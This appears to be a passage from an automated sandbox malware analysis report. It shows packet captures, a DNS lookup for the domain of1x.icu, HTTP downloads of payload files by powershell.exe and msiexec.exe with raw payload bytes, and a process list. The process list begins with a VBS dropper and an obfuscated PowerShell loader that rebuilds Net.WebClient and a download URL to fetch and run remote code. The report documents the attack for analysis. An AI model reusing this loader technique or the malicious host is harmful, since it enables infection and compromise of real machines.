Dec 23, 2024 06:41:44.612387896 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.612396955 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.612469912 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.616859913 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.617326975 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.617332935 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.617414951 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.621622086 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.625514030 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.625519037 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.625585079 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.626437902 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.626600981 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.626605034 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.626672029 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.635643005 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.635751009 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.644694090 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.644802094 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.644895077 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.645350933 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.654048920 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.654155970 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.662987947 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.663079023 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.672146082 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.672205925 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.677109957 CET  443          49737      104.21.86.72  192.168.2.4
Dec 23, 2024 06:41:44.677181959 CET  49737        443        192.168.2.4   104.21.86.72
Dec 23, 2024 06:41:44.685872078 CET  443          49737      104.21.86.72  192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.685942888 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.801872015 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.801949978 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.808180094 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.808343887 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.812088013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.812161922 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.819518089 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.819619894 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.826908112 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.827007055 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.830739021 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.830837965 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.837984085 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.838095903 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.845449924 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.845583916 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.849150896 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.849257946 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.856535912 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.856637001 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.863923073 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.863981009 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.867930889 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.868001938 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.875133038 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.875212908 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.882343054 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.882405043 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.889688969 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.889749050 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.893467903 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.893524885 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.901335955 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.901410103 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.908157110 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.908256054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.911967993 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.912040949 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.996495962 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.996570110 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.002696991 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.002773046 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.005745888 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.005830050 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.011534929 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.011605978 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.017121077 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.017196894 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.022692919 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.022758961 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.025101900 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.025176048 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.029700041 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.029771090 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.032378912 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.032450914 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.037405968 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.037482023 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.045066118 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.045147896 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.045540094 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.045627117 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.049787998 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.049864054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062047958 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062072039 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062108994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062133074 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062143087 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062154055 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062177896 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078120947 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078169107 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078233004 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078233004 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078242064 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078284979 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095261097 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095305920 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095345974 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095351934 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095370054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095412016 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112457991 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112500906 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112533092 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112538099 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112566948 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112574100 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.185950994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.185997963 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.186145067 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.186153889 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.186202049 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.196233988 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.196284056 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.197387934 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.197387934 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.197396994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.197458982 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.203126907 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.203193903 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.203200102 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.203246117 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213164091 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213212013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213254929 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213262081 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213287115 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213303089 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224248886 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224292040 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224335909 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224347115 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224370003 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224390030 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234707117 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234762907 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234790087 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234797001 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234822989 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234853029 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243814945 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243880987 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243911982 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243917942 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243942022 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243974924 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.249777079 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.249861956 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.249878883 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.249943972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255152941 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255196095 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255234957 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255242109 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255254030 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255280972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.380800009 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380848885 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380877972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.380887985 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380914927 CET49737443192.168.2.4104.21.86.72
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 23, 2024 06:41:04.161019087 CET  56276        53         192.168.2.4  1.1.1.1
Dec 23, 2024 06:41:04.558152914 CET  53           56276      1.1.1.1      192.168.2.4

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name      Type            Class        DNS over HTTPS
Dec 23, 2024 06:41:04.161019087 CET  192.168.2.4  1.1.1.1  0xd01e    Standard query (0)  of1x.icu  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name      CName  Address         Type            Class        DNS over HTTPS
Dec 23, 2024 06:41:04.558152914 CET  1.1.1.1    192.168.2.4  0xd01e    No error (0)  of1x.icu         104.21.86.72    A (IP address)  IN (0x0001)  false
Dec 23, 2024 06:41:04.558152914 CET  1.1.1.1    192.168.2.4  0xd01e    No error (0)  of1x.icu         172.67.216.143  A (IP address)  IN (0x0001)  false

• of1x.icu
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        104.21.86.72    443               2504  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:41:05 UTC  172                OUT        GET /CACZkcPf/Schmeer.aca HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: of1x.icu
    Connection: Keep-Alive
2024-12-23 05:41:06 UTC  787                IN         HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 05:41:06 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BT1hPSYjSi83uywDD79F6fX1K488ZhF7K3mhF8AeuXyJHeHmMHVVjVLi1SjqcNmKfGflMz8%2FHq81Vnkvf9OmoqhrgD%2B9bgPfUE%2BIOk3OEA1qU%2BIQz%2BrfPLojsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6605492c894356-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1594&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=786&delivery_rate=1796923&cwnd=237&unsent_bytes=0&cid=d99b8e9e71460e25&ts=644&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49737        104.21.86.72    443               6804  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:41:43 UTC  175                OUT        GET /rTPVLEPs/asyclWl80.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: of1x.icu
    Cache-Control: no-cache
2024-12-23 05:41:44 UTC  856                IN         HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 05:41:44 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=14400
    CF-Cache-Status: MISS
    Last-Modified: Mon, 23 Dec 2024 05:41:43 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tfN1ZJBBXPquTjKAGtDOpiU3cEv5W38WSGnyulSezXj7phjF2ZBDI4Bsm7u4k4jpsqDe%2BhZrL61qGDmTtuxzvwMueyIB3js9i%2Ffn7ZoU1q8FaAgJ6No%2FA%2BCGxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f660634dc80efa7-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1962&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=813&delivery_rate=1433480&cwnd=161&unsent_bytes=0&cid=24108f0f0cda36d7&ts=704&x=0"
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 23 e6 58 2e 58 22 3b 8f 86 63 1d 16 1f 7c e7 b3 72 4a 76 16 64 fe 3e 21 f5 55 af 71 bd 0b 84 73 7f 99 8b 0c cb 58 3a f0 84 50 ac 58 fd d0 0f a0 aa 30 51 f4 85 70 d7 05 d7 5d 49 29 18 e2 4b 93 cc 44 86 78 55 7f b0 9a 3f 8e 3f 55 99 40 e1 eb 18 51 c6 eb 99 8a 3d 0c d7 f7 31 c9 ed 1b 0b aa 7f 0f e1 92 53 3a 72 fc 4a 2d 1a 5d 57 75 e3 02 22 bd c4 5b 65 dc 7c 94 2b a8 57 5f d9 16 dc 5c 6b b5 9d f1 31 fa 56 60 79 ba c3 d5 6d 87 f2 27 80 e6 99 b3 46 df 89 07 0a 94 bf 0a bb 5f 04 23 46 84 9c af ad 8e 29 05 36 03 d8 41 3a b4 12 a5 9e 6d 4f 98 ab 52 c5 c9 5f bd fd 11 00 87 c9 8c ab a3 f0 a5 d0 97 4d 2b de c5 fd 08 d0 84 6c 94 a3 97 4b 88 b6 de 1a 1d 42 bf 8c 7b f6 e2 a8 ec 26 eb ab 1b ee 94 16 7e 6b 3d f8 0d 2b 8a 4b 97 4e c5 6a cf a1 8e 1e 11 d9 25 07 82 b6 af 96
                                                                                                                              Data Ascii: #X.X";c|rJvd>!UqsX:PX0Qp]I)KDxU??U@Q=1S:rJ-]Wu"[e|+W_\k1V`ym'F_#F)6A:mOR_M+lKB{&~k=+KNj%
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 4f d2 9f 54 f0 f7 c1 a5 b1 9d 88 7b c2 99 50 73 50 3a 3d 30 67 e2 63 9e 24 9d 4c 7e ad e4 e7 7e 80 ef 67 19 95 e8 aa 03 3d e6 20 36 f1 ca f7 f4 9b 2c 4a bf 91 d6 a2 15 e0 b8 54 39 a5 b4 b1 16 58 1d c1 de 27 ca af 4f bd 94 86 73 7f 99 80 79 f2 72 68 0a 2e 24 7b f9 d9 8c d1 08 c9 93 4d b2 7e fb 82 e6 54 fa 41 2e ff 9d 1a 6f f7 c2 19 58 33 4f a7 5c 9d fa 0b 36 e9 51 6a 21 96 e6 10 a6 71 10 c5 8a 5f 9a 98 c5 77 63 c5 68 1a e4 ed c2 de 2f 66 47 4e ac 11 fb f8 a7 74 61 de 52 c6 d0 28 45 7c 9e b8 fd a8 7e 76 fe 67 cc 35 3e 64 a1 07 35 ee 9f ab 2d cf 5e c8 87 40 61 44 49 e6 0c 8e 61 21 9f da 18 f0 9c 01 22 0c 83 5b 93 5b ae 26 41 f0 2b f4 5b 1a 45 b3 bf 89 a2 d8 28 f0 74 d8 bf 3b fb 48 8c 07 06 59 0a 09 f8 f5 71 f6 8e 10 ef 43 3c 7a 99 a6 55 99 46 32 dd e3 b3 16
                                                                                                                              Data Ascii: OT{PsP:=0gc$L~~g= 6,JT9X'Osyrh.${M~TA.oX3O\6Qj!q_wch/fGNtaR(E|~vg5>d5-^@aDIa!"[[&A+[E(t;HYqC<zUF2
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 57 ac 68 0a 5f 97 b7 f9 eb 12 a2 75 34 0d 97 56 d7 c2 d2 58 0a a5 0e db 21 29 65 77 7a f4 68 9d 68 de d0 c1 19 af 52 d5 74 aa 53 58 9a eb f3 4b 0f 09 db 12 68 5f 03 37 6d 5b 8d 7b ab bb 2d 08 67 e2 e3 46 ab 78 12 6f e4 d6 ef df 84 54 c2 bd e1 fe 12 8d 01 fe 20 42 70 11 b1 b1 00 c2 39 34 4a 00 0f 64 19 b8 de 4e 16 e5 a5 d5 27 c1 ff 2e fc 3a 24 81 55 df 3d 98 d7 9f 7a 29 b2 f4 48 1a 2c 24 5a 40 2c 23 a5 0e aa 32 32 bd 69 5c 3a 11 20 87 8c e5 79 50 6b 8b 9d 9f a6 9f fb 7b b0 3c e6 41 d0 9d 30 3e f1 62 34 1b 64 14 7e f1 16 ab c9 7c ea 42 1a ce 94 68 1c 59 bc 6d 27 4e 8e 65 8e 59 d6 52 ef 25 cc 15 21 e0 94 0c 06 1b db a8 85 72 ec 0f ed 99 78 be 7a f5 cd 1f 8d ca e2 9f df f3 83 f1 18 85 1d 9a 5f c0 c6 d0 55 cf ca 14 78 2f c2 7a 14 79 e4 01 69 93 d1 ff fd 71 d6
                                                                                                                              Data Ascii: Wh_u4VX!)ewzhhRtSXKh_7m[{-gFxoT Bp94JdN'.:$U=z)H,$Z@,#22i\: yPk{<A0>b4d~|BhYm'NeYR%!rxz_Ux/zyiq
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 7b 7d 43 58 71 16 dc 00 2f 74 ed 9f dd c4 01 af 39 42 f8 45 a6 23 f8 42 4a 89 14 0a 2f 39 27 a6 a3 5a 04 1e fd f9 fd 17 ab f0 c6 fe 0a cf b9 61 69 1c 36 a4 42 2c 21 95 d4 07 99 ae 0c 75 16 7c 82 6f b0 8d aa d3 ee 45 c7 6e 12 bb 97 47 dc c1 6d e2 dc ff 1c af 01 32 01 c5 94 ac 07 83 69 14 bd 54 61 bb af a0 f1 e7 ea 82 e9 b0 98 96 52 23 55 79 1d 28 77 9e a2 db 05 0e 97 eb e9 fb e2 66 a8 25 ff 49 95 24 66 7d 73 d2 3b 8c 3e 65 eb 01 46 a1 de 3a 32 5a b9 fe e1 11 34 c9 e4 7c db 7e 3d c8 7e 8c 80 99 88 cf 02 bb 6c 0a 11 af ff ef b6 9b 5a 7a ef 17 21 41 81 70 5a a2 fb 02 9c 0d 53 f1 b0 6c 99 9f 82 f4 5c 78 cc 2f 4b 88 b9 b1 ef ad d7 0e b8 f0 f1 9f 30 d5 73 17 24 08 25 4c 22 ce 98 30 7f 55 e4 92 53 e9 76 0f 2d 1e 8d ec 39 b9 2d 02 9c 5f 3b a4 6d f6 3a da 3e dd e8
                                                                                                                              Data Ascii: {}CXq/t9BE#BJ/9'Zai6B,!u|oEnGm2iTaR#Uy(wf%I$f}s;>eF:2Z4|~=~lZz!ApZSl\x/K0s$%L"0USv-9-_;m:>


                                                                                                                              Target ID:0
                                                                                                                              Start time:00:40:59
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs"
                                                                                                                              Imagebase:0x7ff7e5590000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:00:41:00
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
